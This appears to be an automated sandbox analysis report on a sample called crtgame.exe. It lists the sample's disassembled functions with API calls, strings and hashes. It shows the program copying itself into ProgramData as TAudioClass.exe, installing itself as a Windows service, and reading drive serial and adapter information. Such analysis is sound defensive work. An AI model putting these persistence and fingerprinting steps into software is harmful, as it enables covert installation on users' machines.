Inno-Setup-RegSvr-Mutex, xrefs: 00496921
.msg, xrefs: 0049698E
/REG, xrefs: 004968C9
.lst, xrefs: 004969A8

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseDeleteFileHandleMutexRelease
String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
API String ID: 3841931355-3392794427
Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C

Function 00421D38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
GetFocus.USER32 ref: 00421D69

Strings

+qI, xrefs: 00421D39

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Focus
String ID: +qI
API String ID: 2734777837-4068327824
Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C

Function 00456C04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28

Strings

$pI, xrefs: 00456C23

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Time$FileSystem
String ID: $pI
API String ID: 2086374402-3761944556
Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C

Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356

Strings

H6u, xrefs: 0040335B

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: H6u
API String ID: 2123368496-683348396
Opcode ID: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
Instruction ID: 938fc5d7150061a66cd9a397de50459b98cc473a78e96f9e03329754a5f1b6bd
Opcode Fuzzy Hash: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
Instruction Fuzzy Hash: 57C002A09012058AE750AFB6A84AB552A94A751349F8044BFB104BA2E2DA7D82156BDF

Function 00454B90 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 00454BAF
Sleep.KERNEL32(?), ref: 00454BBF
GetLastError.KERNEL32 ref: 00454BD2
GetLastError.KERNEL32 ref: 00454BDC

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

Analysis Process: crtgame.exePID: 6008, Parent PID: 2200COMMON

Execution Graph

Execution Coverage:	21.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.3%
Total number of Nodes:	400
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004026F0 Relevance: 57.9, APIs: 26, Strings: 7, Instructions: 196
registrystringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402714
GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 0040272B
GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402748
CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274F
GetLocalTime.KERNEL32(00409F20,?,00000000), ref: 0040275C
lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277E
CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027CB
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D2
ExitProcess.KERNEL32 ref: 004027D9
lstrcmpiW.KERNEL32(?,00407108,?,00000000), ref: 004027FB
RegCreateKeyExA.KERNELBASE(80000002,Software\TLGraphicsMode,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 0040282A
GetTickCount.KERNEL32 ref: 0040284D
wsprintfA.USER32 ref: 00402865
RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402888
RegCloseKey.KERNELBASE(?), ref: 00402891
StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040295F

Strings

tac1210%d, xrefs: 0040285F, 004028F7
test, xrefs: 004027A8
C:\Program Files (x86)\CRTGame\crtgame.exe, xrefs: 0040271A, 00402724, 00402788, 004027AD, 004027CA
TAudioClass, xrefs: 00402731
TAudioClass, xrefs: 004026FE, 00402736
Software\TLGraphicsMode, xrefs: 00402820, 004028BC
/chk, xrefs: 00402776

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$Software\TLGraphicsMode$TAudioClass$TAudioClass$tac1210%d$test
API String ID: 99468869-594702758
Opcode ID: 1774414c222657f30e0ff0fda0a7ecf03fc2325e43c918c94e521cb7f69dc8be
Instruction ID: 4fae6dedbb5559179aee60a5bd746ea385fcb214e20c208df2d3a45f8cd54b52
Opcode Fuzzy Hash: 1774414c222657f30e0ff0fda0a7ecf03fc2325e43c918c94e521cb7f69dc8be
Instruction Fuzzy Hash: C76132B1940219BFEB10DBA19E4DFAE7BBCEB04349F104176B606F21D1D7789D148B68

Function 00402548 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 142
serviceregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,74DEF360,00000000), ref: 00402582
GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,74DEF360,00000000), ref: 00402589
GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360), ref: 004025EA
GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360,00000000), ref: 004025F1
RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402608
RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\TAudioClass\TAudioClass.exe,?), ref: 00402632
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360,00000000), ref: 00402643
CreateDirectoryA.KERNELBASE(C:\ProgramData\TAudioClass\TAudioClass.exe,00000000), ref: 00402665
CopyFileA.KERNEL32(?,C:\ProgramData\TAudioClass\TAudioClass.exe,00000000), ref: 00402694
OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A2
CreateServiceA.ADVAPI32(00000000,TAudioClass,TAudioClass,000F01FF,00000010,00000002,00000001,C:\ProgramData\TAudioClass\TAudioClass.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C3
CloseServiceHandle.ADVAPI32(00000000), ref: 004026D0
CloseServiceHandle.ADVAPI32(00000000), ref: 004026E4
CloseServiceHandle.ADVAPI32(00000000), ref: 004026E9

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004025FE
.exe, xrefs: 0040267D
Common AppData, xrefs: 00402627
TAudioClass, xrefs: 00402654, 00402659, 00402676, 004026C0, 004026C1
C:\ProgramData\TAudioClass\TAudioClass.exe, xrefs: 0040256A, 00402570, 00402624, 0040264E, 0040265A, 00402664, 00402670, 00402677, 00402682, 00402692, 004026B4

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
String ID: .exe$C:\ProgramData\TAudioClass\TAudioClass.exe$Common AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$TAudioClass
API String ID: 3461818117-1310459540
Opcode ID: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
Instruction ID: ab6d53e788ee7b1a4f89e64ab78f532d797b3e843243f72342cd50906d5f4c6a
Opcode Fuzzy Hash: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
Instruction Fuzzy Hash: A541B6B1940108BBEB20AB61DE4EE9F3B6DEF41745F00043AF601B11D2D7B95D509A7D

Function 00401B54 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
FreeLibrary.KERNEL32(00401A3E), ref: 00401C24

Strings

o, xrefs: 00401BFB
iphlpapi.dll, xrefs: 00401B61
GetAdaptersInfo, xrefs: 00401B77

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: Library$AdaptersAddressFreeInfoLoadProc
String ID: GetAdaptersInfo$iphlpapi.dll$o
API String ID: 514930453-3667123677
Opcode ID: fe97a66bfe1a0e4a090fceeb56766dae8f1332a0d6ba4185a88c48e8e01133b6
Instruction ID: a5aee0b79a35ee34078b30f54a7b4ada864a53d9b06d06d0c5030cf98c67091c
Opcode Fuzzy Hash: fe97a66bfe1a0e4a090fceeb56766dae8f1332a0d6ba4185a88c48e8e01133b6
Instruction Fuzzy Hash: 3121A770944209AFDF21DBA5C9447EFBBB4EF41344F1440BAE504B22E1E7789A85CB69

Function 00401A58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
GetLastError.KERNEL32 ref: 00401B17
CloseHandle.KERNELBASE(?), ref: 00401B46

Strings

\\.\PhysicalDrive0, xrefs: 00401A6C

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLast
String ID: \\.\PhysicalDrive0
API String ID: 4026078076-1180397377
Opcode ID: 6658c9d09989f05e0195eaddce68eb37b9664083837fa87bf39f3550b185ff27
Instruction ID: 0eed0264e883c0688f73d788d7d0bd333b7eda35479a1ece95cf3a9209f64869
Opcode Fuzzy Hash: 6658c9d09989f05e0195eaddce68eb37b9664083837fa87bf39f3550b185ff27
Instruction Fuzzy Hash: 75315A71D01118AACB21EF96DD849EFBBB9EF40750F20817AE515B22A0E3785E45CF98

Function 00402F82 Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32 ref: 00402FA8

Part of subcall function 004032BA: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FE1,00000000), ref: 004032CB
Part of subcall function 004032BA: HeapDestroy.KERNEL32 ref: 0040330A

GetCommandLineA.KERNEL32 ref: 00402FF6
GetStartupInfoA.KERNEL32(?), ref: 00403021
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403044

Part of subcall function 0040309D: ExitProcess.KERNEL32 ref: 004030BA

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID:
API String ID: 2057626494-0
Opcode ID: fc7c75a0fca1fc71633c191dac2b30b5283b5d3f62fb2d5ff47b98b0991d1776
Instruction ID: 9dac6a1a792168accaafc8f216740def6c4fb0c1b32456360c1ba9f1c8530c2f
Opcode Fuzzy Hash: fc7c75a0fca1fc71633c191dac2b30b5283b5d3f62fb2d5ff47b98b0991d1776
Instruction Fuzzy Hash: D4217CB1800714AADB04AFA6DE09A6E7BA9EB45315F10013EFA05BB2D1DB784810CB99

Function 00401C5B Relevance: 6.0, APIs: 4, Instructions: 37
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
CloseHandle.KERNEL32(00000000), ref: 00401CB1

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: File$CloseCreateDirectoryHandleTimeWindows
String ID:
API String ID: 87451460-0
Opcode ID: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
Instruction ID: cc4b8a8173e68006100f6bb5cfe5cbca554eec38252bcd741f722b6c7c402e1e
Opcode Fuzzy Hash: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
Instruction Fuzzy Hash: 7CF0E27668021077E6209B359E8DFCB3AAD9BC6B60F010134BB46F21D0D6B49551C6B4

Function 004041DB Relevance: 4.5, APIs: 3, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,004041C6,?,00000000,00000000,00403059,00000000,00000000), ref: 004041EB
TerminateProcess.KERNEL32(00000000,?,004041C6,?,00000000,00000000,00403059,00000000,00000000), ref: 004041F2
ExitProcess.KERNEL32 ref: 0040426C

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
Instruction ID: 3c2d901587470c3af459565a9284c94394272298cc372ce865a47b82234f48c2
Opcode Fuzzy Hash: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
Instruction Fuzzy Hash: 7501D2B1648301DEDA10AF65FE44A0A7BB4FBD4391B11457FF241761E0C739A851CA2E

Function 004032BA Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FE1,00000000), ref: 004032CB

Part of subcall function 00403172: GetVersionExA.KERNEL32 ref: 00403191

HeapDestroy.KERNEL32 ref: 0040330A

Part of subcall function 00403317: HeapAlloc.KERNEL32(00000000,00000140,004032F3,000003F8), ref: 00403324

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
Instruction ID: 02f34df244f728f86bc68da1e651a6997b8534df00875083e7ca9fefff41b132
Opcode Fuzzy Hash: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
Instruction Fuzzy Hash: C1F06530554301A9EF201F305D8AB2A3DA89794757F14483BF881F91D1EF7D8A91950E

Non-executed Functions

Function 00402428 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75
registrysynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(TAudioClass,Function_000023D3), ref: 00402436
SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
GetLastError.KERNEL32 ref: 00402497
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A4
GetLastError.KERNEL32 ref: 004024C5
SetServiceStatus.ADVAPI32(0040A058), ref: 004024F5
CreateThread.KERNEL32(00000000,00000000,Function_00002351,00000000,00000000,00000000), ref: 00402501
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040250A
CloseHandle.KERNEL32 ref: 00402516
SetServiceStatus.ADVAPI32(0040A058), ref: 0040253F

Strings

TAudioClass, xrefs: 00402431

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
String ID: TAudioClass
API String ID: 3346042915-824782384
Opcode ID: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
Instruction ID: 7efe40ee76daeed059ea918d990e5cbaeb6ba916a4eee0f1f7423c99795c6411
Opcode Fuzzy Hash: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
Instruction Fuzzy Hash: 1321A9B0841348EBD2119F36FF48E177FA8EB96719715813AE505B22B0C7BA0464DF2E

Function 004058B7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 004058C9
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004058E1
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004058F2
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004058FF

Strings

MessageBoxA, xrefs: 004058DB
GetActiveWindow, xrefs: 004058EC
GetLastActivePopup, xrefs: 004058F4
user32.dll, xrefs: 004058C4
xe@, xrefs: 00405925, 00405929

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
API String ID: 2238633743-4073082454
Opcode ID: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
Instruction ID: 2d5919ac961fb8b47e5806104f76029f10fe1308888878a2fdfea3e3d59386dd
Opcode Fuzzy Hash: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
Instruction Fuzzy Hash: 4A017171640701EFC7109FB5AD8091B3BE8EA487A0711043FA105F23E2DA7988619F29

Function 00405B7F Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000), ref: 00405BC1
LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BDD
LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404EF3,?,00000103,00000001,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000), ref: 00405C26
MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000), ref: 00405C5E
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EF3,00200020,00000000,?,00000000), ref: 00405CB6
LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EF3,00200020,00000000,?,00000000), ref: 00405CCC
LCMapStringW.KERNEL32(00000000,?,00404EF3,00000000,00404EF3,?,?,00404EF3,00200020,00000000,?,00000000), ref: 00405CFF
LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EF3,00200020,00000000,?,00000000), ref: 00405D67

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 6fb03f0de8e14ffbba6d39a053688989b4d07ae79834ee937682c639a33d809c
Instruction ID: b71a23c0b73b48c52d5bda9799daf5958ca8c82b9c5fc6ae779467d82ee1466a
Opcode Fuzzy Hash: 6fb03f0de8e14ffbba6d39a053688989b4d07ae79834ee937682c639a33d809c
Instruction Fuzzy Hash: 6C514A31900609ABDF229F94DD49E9F7BB9EF48750F10812BF915B12A0D33A8960DF69

Function 00404C59 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404CC6
GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00404D9C
WriteFile.KERNEL32(00000000), ref: 00404DA3

Strings

Runtime Error!Program: , xrefs: 00404D2C
..., xrefs: 00404D18
Microsoft Visual C++ Runtime Library, xrefs: 00404D72
<program name unknown>, xrefs: 00404CD6

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
Instruction ID: dc6fb59b036afc32ad7d883685c443d86e427d7c65881978fb0b24905fa46ab3
